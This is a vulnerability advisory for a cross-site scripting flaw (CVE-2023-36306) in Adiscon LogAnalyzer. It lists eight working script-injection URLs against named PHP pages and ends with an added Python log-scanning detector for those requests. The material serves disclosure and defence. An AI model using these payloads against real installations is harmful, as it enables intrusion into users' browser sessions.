# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation methods. If LogAnalyzer was installed without a database (file-based), no login is needed. If it was installed with a database, you need to log in as at least a read-only user.

The XSS payloads are as below. The first two inject through a query-string parameter value (`uid=`) and a parameter name, respectively; the rest inject through the extra path segment after `script.php/`, which PHP exposes as PATH_INFO:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
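Added example, not part of the advisory: a small Python detector that scans constructed Apache access-log lines for the two request shapes listed above (a payload in a query-string value or name, and a payload appended as PATH_INFO after `script.php/`) against the LogAnalyzer scripts named in the advisory, percent-decoding repeatedly so double-encoded variants are not missed. The log lines, IP address and timestamps are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (sample data, not real traffic).
# Targets mirror the advisory: payload in a query value, in a query
# parameter name, and in PATH_INFO after details.php/ ; plus two benign hits.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2023:10:00:01 +0000] "GET /loganalyzer/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2023:10:00:02 +0000] "GET /loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2023:10:00:03 +0000] "GET /loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123 HTTP/1.1" 200 4421 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2023:10:00:04 +0000] "GET /loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 930 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2023:10:00:05 +0000] "GET /loganalyzer/search.php?filter=error&highlight=on HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Markup that has no legitimate place in a LogAnalyzer request target.
XSS_MARKERS = re.compile(r'<\s*script|"\s*>|javascript:', re.IGNORECASE)
# Scripts named in the advisory.
LOGANALYZER_SCRIPTS = ("asktheoracle.php", "chartgenerator.php", "details.php",
                       "index.php", "search.php", "export.php", "reports.php",
                       "statistics.php")

def decode_fully(s, max_rounds=3):
    """Percent-decode until the string stops changing (catches %253C-style double encoding)."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def classify(target):
    """Return 'path_info' or 'query' for where the suspicious input sits, else None."""
    path, _, query = target.partition("?")
    if XSS_MARKERS.search(decode_fully(path)):
        return "path_info"     # script.php/<payload>: extra segment lands in PATH_INFO
    if XSS_MARKERS.search(decode_fully(query)):
        return "query"         # payload in a parameter value or parameter name
    return None

def scan(log_text):
    """Yield one finding per request to a LogAnalyzer script that carries XSS markers."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        script = next((s for s in LOGANALYZER_SCRIPTS if "/" + s in target), None)
        if script is None:
            continue
        vector = classify(target)
        if vector:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "script": script, "vector": vector})
    return findings
```

Run `scan(SAMPLE_LOG)` to get the three injected requests with their vector; the two benign requests produce nothing.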